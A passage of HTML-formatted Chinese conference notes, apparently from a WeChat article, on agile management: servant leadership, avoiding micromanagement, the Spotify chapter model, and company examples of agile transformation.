style="font-family:微软雅黑;font-size:11.0pt;">让每个人都是多能的</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">管理应该支持团队形成自组织的能力</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Bosh</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">有个CEO，取消所有管理</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">者</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">的奖金，给团队发奖金</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">管理者是导致公司运作变慢的原因</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">管理者倾向于</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">push自己的行动</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">其实管理者</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">要为整体的revenue负责。</span></p></li></ul></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">3 Tesla</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">、马斯克强调要在现场，观察生产线。</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">了解团队的问题是什么，并清除团队自己无法清除的任何障碍。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="yo">Musk</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">大部分时间在生产线，理解工人，解决问题，离开办公室</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，才能看到真正的办公场所的问题，需要走动，需要观察。</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">4 提供远景，支持团队，千万不要微观管理</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">管理者是团队的一部分，他们需要为团队绩效负责</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">硅谷</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">CISCO</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">有</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">1</span><span style="font-family:Calibri;font-size:11.0pt;" lang="yo">000</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">个scrum团队</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">从数据看，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">没有一个</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">SCRUM</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">团队是在改善的，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">有</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">1000</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">个</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">s</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">m</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，但是</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">没有做好</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">工作</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">绩效没改善，sm要替换。</span></p></li><ul type="square" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">要好好培训，让他们发挥作用</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">培训后，再没有改善，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">就要</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">负主责</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，替换掉</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">要催化变更，让产品增值</span></p></li></ul></ul></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;">5 80</span><span style="font-family:微软雅黑;font-size:11.0pt;">%的问题是系统造成的</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">根本的错误是什么？</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="yo">80</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">%的问题是系统造成的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，高层更要意识到这点</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">80</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">的问题是高层设置、组织造成的，只有高层能解决这些问题，高层才能改变组织和行为。</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">有些公司非常注重绩效考核</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">问：每周做绩效考核，可否在半年内绩效提升一倍，公司销售可否增加一倍，一般大家都不信能达成这个目标</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">建议怎么做</span></p></li><ul type="square" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">组成团队，目标绩效翻倍，你们自己看要怎么做</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">管理层为团队提供各种支持</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">包括胜任的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">团队要想办法怎么去做</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">管理者需要更多的时间，去考察团队的行为，看看团队的障碍在哪（</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">block</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">）</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">管理层大多数时间是绊脚石</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，要忍住瞎指挥的欲望</span></p></li></ul></ul></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">要专注于改变系统，使不良行为消失。</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">6 理解不可能通过增加个人业绩而使得团队绩效翻倍。</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">问管理层：绩效评估，对每个经理人进行单独的绩效考核，如果每周都做绩效考核，每周都改进两倍，6个月后公司绩效可否改善2倍？管理层一般回答不可行。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">对敏捷团队：如何在6个月内改善2倍绩效？提供一切条件，给个好的sm，一般团队可以达成目标。帮助团队改善更加现实</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">可行</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">，一般能达成目标。</span></p></li></ul></ul><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5571095571095571" data-s="300,640" style="height: auto !important;" data-type="png" data-w="858" src="https://wechat2rss.xlab.app/img-proxy/?k=2688c31d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8CZBpgmiaKyj16DvjVuWoqr0GR8boJFiaA0xyqTs1sDy1P7viczBsxBpZQ%2F640%3Fwx_fmt%3Dpng"/></p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">改变工作内容</h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;">管理者，或者任何人，都应该思考的问题</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">我最拿手的是什么？</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">要怎样才能为公司提供我的最大价值？</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">我怎样才能更快乐？工资更高？</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">如何指导更多的人，让他们成长得更好</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">【思】领悟了之后，要把自己的</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">job description</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">改掉</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">CTO</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">花了</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">8</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">的时间在高管会议上，他喜欢的的写代码，他的</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">job
     description</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:
     11.0pt;" lang="zh-CN">改成：</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">80</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">的时间与团队直接协作、工作</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">8</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">的时间去和高管开会</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">管理层、</span><span lang="zh-CN">升职、</span><span lang="yo">奖励机制是问题的来源，这个需要改变。</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">牛人都会升官，升官了之后他就没有时间做他擅长的东西了</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;color:red;">在敏捷组织中，我们希望牛人升官后，他们的技能还能继续发挥价值</span><span style="font-family:微软雅黑;font-size:11.0pt;">。</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">作为经理，你有模范的技能</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">这些技能非常宝贵，你可以在某个</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">的角色中做出贡献</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">在这些角色中体现</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">价值和仆人式领导</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="color:
red;">经理们如果只是指手画脚，那他存在的就只是增加了管理成本，而不能积极为客户创造价值。他们的其他技能可能会萎缩，使他们没有能力帮助发展他们的团队，从而影响到团队成员的工作热情和工作稳定性</span>。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">团队需要很多数据，需要</span><span lang="zh-CN">发声，说出真相，</span><span lang="yo">公开沟通，openness，相互尊重，经理需要</span><span lang="zh-CN">真的</span><span lang="yo">倾听，成员要有勇气说出真正的故事。</span><span lang="zh-CN">只有这样，团队才能梳理清楚要做什么，才能去冒险，去试验，才能改变现状</span><span lang="yo">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">管理者的价值观要根本上改变，团队的绩效才有可能有根本的变化。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5653179190751445" data-s="300,640" style="height: auto !important;" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b03d120d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8un4FSVEHGoc5RPImEVw1ZN9xPdNCZNT05trlubfDTibvPeY2s4Z1JbQ%2F640%3Fwx_fmt%3Dpng"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
Calibri;" lang="yo">Spotify</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">的分会</span><span style="font-family:微软雅黑;" lang="yo">模型</span></h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">如果你是个专家，例如QA</p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">你雇用、培训一些</span><span lang="en-US">QA</span><span lang="zh-CN">队员</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">QA</span><span lang="zh-CN">队员</span><span lang="yo">参加到多个</span><span lang="zh-CN">自组织的</span><span lang="en-US">s</span><span lang="yo">crum团队中</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">你为公司制定QA策略，</span><span lang="zh-CN">计划</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">你让</span><span lang="en-US">QA</span><span lang="zh-CN">队员认可这些策略和计划</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">QA</span><span lang="zh-CN">队员在日常工作中，具体实施这些计划</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">日常工作中，你并不管理</span><span lang="en-US">QA</span><span lang="zh-CN">队员</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">质量不好，要质问</span><span lang="en-US">QA</span><span lang="zh-CN">专家（</span><span lang="en-US">chapter lead</span><span lang="zh-CN">）</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">你的质量改进计划在哪？要做哪些行动计划？</p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">你不再对每天的危机进行微观管理，</p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">你的哪些行动计划、规划真的得到了落实</p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">微观管理、危机管理不是在领导团队进步，应该让团队自我管理</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6437429537767756" data-s="300,640" style="height: auto !important;" data-type="png" data-w="887" src="https://wechat2rss.xlab.app/img-proxy/?k=c89c4971&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8KzjAzttOTfrHQJZwbicwODVicuuBibzSqZb006UOzoc8wIuPibchmia9Avg%2F640%3Fwx_fmt%3Dpng"/></p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">别让敏捷转型失败</h1><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="yo">MIT</span><span style="font-family:微软雅黑;" lang="yo">斯隆商学院：</span><span style="font-family:Calibri;" lang="en-US">53</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">的</span><span style="font-family:微软雅黑;" lang="yo">转型</span><span style="font-family:微软雅黑;" lang="zh-CN">会</span><span style="font-family:微软雅黑;" lang="yo">失败，</span><span style="font-family:微软雅黑;" lang="zh-CN">转型失败中</span><span style="font-family:Calibri;" lang="en-US">67</span><span style="font-family:微软雅黑;" lang="yo">%的公司会倒闭</span><span style="font-family:微软雅黑;" lang="zh-CN">。</span></p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">1 自组织，自我管理</span></strong></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">集中的计划会破坏自组织</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="yo">BMW</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">，每年年底疯狂花钱，保证明年有够多的预算。</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">在中国肯定也这样！</span><span style="font-family:微软雅黑;font-size:11.0pt;color:red;" lang="en-US">BMW</span><span style="font-family:微软雅黑;font-size:11.0pt;color:red;" lang="zh-CN">觉得这种集中年度预算会导致</span><span style="font-family:Calibri;font-size:11.0pt;color:red;" lang="en-US">3</span><span style="font-family:Calibri;font-size:11.0pt;color:red;" lang="yo">0</span><span style="font-family:微软雅黑;font-size:11.0pt;color:red;" lang="yo">%的浪费</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">需要做敏捷预算管理，这样就能节省</span><span style="font-family:Calibri;font-size:11.0pt;">30</span><span style="font-family:微软雅黑;font-size:11.0pt;">%了</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">老想法，被限制做了，</span><span style="font-family:微软雅黑;font-size:11.0pt;color:red;">被传统老想法封印了</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">命令与控制，会毁坏团队</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">中国人喜欢command and control</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">中国的敏捷团队也很多，有些公司消灭了微观管理，他们会很成功</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">小团队，只有一份job description</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">Rocket mortgage</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">原来一个团队里有</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">15</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">份</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">jd</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US"><span style="mso-spacerun:yes;"> </span></span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">后面改为</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">小团队，只有一份job description</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">大家都要学，具备多种能力，不行就转走</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">如果绩效没改善，sm就换掉，和球队教练一样</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">产品客户不喜欢，就换掉po</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">这样速度能提高</span><span style="font-family:Calibri;font-size:11.0pt;">8</span><span style="font-family:微软雅黑;font-size:11.0pt;">倍</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">管理层需要知道这些本质性的问题</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">德国电信，花</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">6</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">个月做个大计划</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">是不对的，改成：</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">先讨论</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sprint1</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">要做什么</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">每周、每个迭代，在分析要做什么更好</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">发生了新的情况，反思，改计划</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">要有清晰的愿景，但是这不需要</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">6</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">个月的时间去做计划</span></p></li><ul type="square" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">团队自己想办法</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">团队的表现，将是超过所有个人的总和</span></p></li></ul></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">自组织团队的绩效会好太多，指数级的差别</span></p></li></ul><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><br/></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-weight: bold;"><p><strong><span style="font-family:微软雅黑;font-size:11.0pt;">2 没有单点控制</span></strong></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">iRobot</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">的联合创始人，教授，做出了自学习、自组织的机器人</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">MIT30</span><span style="font-family:&#34;Microsoft 